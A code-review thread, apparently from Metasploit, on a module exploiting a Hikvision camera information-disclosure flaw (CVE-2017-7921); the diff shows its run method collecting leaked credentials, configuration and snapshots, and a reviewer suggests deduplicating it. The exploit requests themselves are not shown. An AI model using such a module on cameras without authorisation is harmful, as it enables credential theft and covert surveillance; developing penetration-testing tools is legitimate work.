modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb

```diff
@@ -0,0 +1,374 @@
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def run
+    return unless check == Exploit::CheckCode::Vulnerable
+
+    case action.name
+    when 'Automatic'
+      print_status('Running in automatic mode')
+
+      print_status('Getting the user credentials...')
+      creds_loot_data = get_creds
+      unless creds_loot_data.nil?
+        if datastore['PRINT'] == true
+          print_status(creds_loot_data.to_s)
+        end
+        loot_path = store_loot('hikvision.credential', 'text/plain', datastore['RHOSTS'], creds_loot_data, 'credentials', 'leaked credentials')
+        print_good("User credentials are successfully saved to #{loot_path}")
+      end
+
+      print_status('Getting the camera hardware and software configuration...')
+      config_loot_data = get_config
+      unless config_loot_data.nil?
+        if datastore['PRINT'] == true
+          print_status(config_loot_data.to_s)
+        end
+        loot_path = store_loot('hikvision.config', 'text/plain', datastore['RHOSTS'], config_loot_data, 'configuration', 'camera configuration')
+        print_good("Camera configuration details are successfully saved to #{loot_path}")
+      end
+
+      print_status('Taking a camera snapshot...')
+      snapshot_loot_data = take_snapshot
+      unless snapshot_loot_data.nil?
+        loot_path = store_loot('hikvision.image', 'jpeg/image', datastore['RHOSTS'], snapshot_loot_data, 'snapshot', 'camera snapshot')
+        print_good("Camera snapshot is successfully saved to #{loot_path}")
+      end
+    when 'Credentials'
+      print_status('Getting the user credentials...')
+      creds_loot_data = get_creds
+      unless creds_loot_data.nil?
+        if datastore['PRINT'] == true
+          print_status(creds_loot_data.to_s)
+        end
+        loot_path = store_loot('hikvision.credential', 'text/plain', datastore['RHOSTS'], creds_loot_data, 'credentials', 'leaked credentials')
+        print_good("User credentials are successfully saved to #{loot_path}")
+      end
+    when 'Configuration'
+      print_status('Getting the camera hardware and software configuration...')
+      config_loot_data = get_config
+      unless config_loot_data.nil?
+        if datastore['PRINT'] == true
+          print_status(config_loot_data.to_s)
+        end
+        loot_path = store_loot('hikvision.config', 'text/plain', datastore['RHOSTS'], config_loot_data, 'configuration', 'camera configuration')
+        print_good("Camera configuration details are successfully saved to #{loot_path}")
+      end
+    when 'Snapshot'
+      print_status('Taking a camera snapshot...')
+      snapshot_loot_data = take_snapshot
+      unless snapshot_loot_data.nil?
+        loot_path = store_loot('hikvision.image', 'jpeg/image', datastore['RHOSTS'], snapshot_loot_data, 'snapshot', 'camera snapshot')
+        print_good("Camera snapshot is successfully saved to #{loot_path}")
+      end
+    end
```

Comment:
This seems like is contains a lot of duplication that could be move into the actions methods like `get_creds/take_snapshot` and reduced to:

```
local_actions = {
  'Automatic' => [:get_creds, :get_config, :take_snaphot],
  'Credentials' => [:get_creds],
  'Configuration' => [:get_config],
  'Snapshot' => [:take_snapshot],
}

local_actions[action.name].each do |f|
  call(f)
end
```

Reply:
@jmartin-r7,
Ok, good suggestion. let me move some of the store_loot code back into the functions and use your actions method.
I will push a new update including the report_creds issue shortly after testing...